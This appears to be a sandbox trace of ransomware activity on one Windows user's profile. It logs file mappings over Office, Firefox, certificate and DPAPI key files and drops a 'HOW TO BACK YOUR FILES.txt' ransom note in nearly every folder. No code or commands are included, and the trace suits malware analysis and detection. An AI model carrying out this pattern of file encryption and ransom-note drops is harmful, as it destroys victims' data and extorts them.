Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, protection = PAGE_READWRITE, maximum_size = 380784 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm, protection = PAGE_READWRITE, maximum_size = 18704 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, protection = PAGE_READWRITE, maximum_size = 495840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_31FD1255772945E99CBED4370F39872D.dat filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_31FD1255772945E99CBED4370F39872D.dat, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, protection = PAGE_READWRITE, maximum_size = 944 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST, protection = PAGE_READWRITE, maximum_size = 1520 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST, protection = PAGE_READWRITE, maximum_size = 848 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\20cac00a-26e8-46c6-ab84-90a52b05e557 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\20cac00a-26e8-46c6-ab84-90a52b05e557, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\ddbd6a25-732f-4175-9949-5cdf51e0bd09 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\ddbd6a25-732f-4175-9949-5cdf51e0bd09, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml, protection = PAGE_READWRITE, maximum_size = 3104 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl, protection = PAGE_READWRITE, maximum_size = 38512 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat, protection = PAGE_READWRITE, maximum_size = 912 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\hwcompat.txt filename = C:\Windows10Upgrade\resources\i386\hwcompat.txt, protection = PAGE_READWRITE, maximum_size = 17280 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT, protection = PAGE_READWRITE, maximum_size = 1245440 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\hwexclude.txt filename = C:\Windows10Upgrade\resources\i386\hwexclude.txt, protection = PAGE_READWRITE, maximum_size = 3040 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\nxquery.cat filename = C:\Windows10Upgrade\resources\i386\nxquery.cat, protection = PAGE_READWRITE, maximum_size = 10640 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\nxquery.inf filename = C:\Windows10Upgrade\resources\i386\nxquery.inf, protection = PAGE_READWRITE, maximum_size = 2272 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\i386\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, protection = PAGE_READWRITE, maximum_size = 1248 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json, protection = PAGE_READWRITE, maximum_size = 1120 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib, protection = PAGE_READWRITE, maximum_size = 3232 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx, protection = PAGE_READWRITE, maximum_size = 3706832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71 filename = C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71, protection = PAGE_READWRITE, maximum_size = 816 True 1
Fn
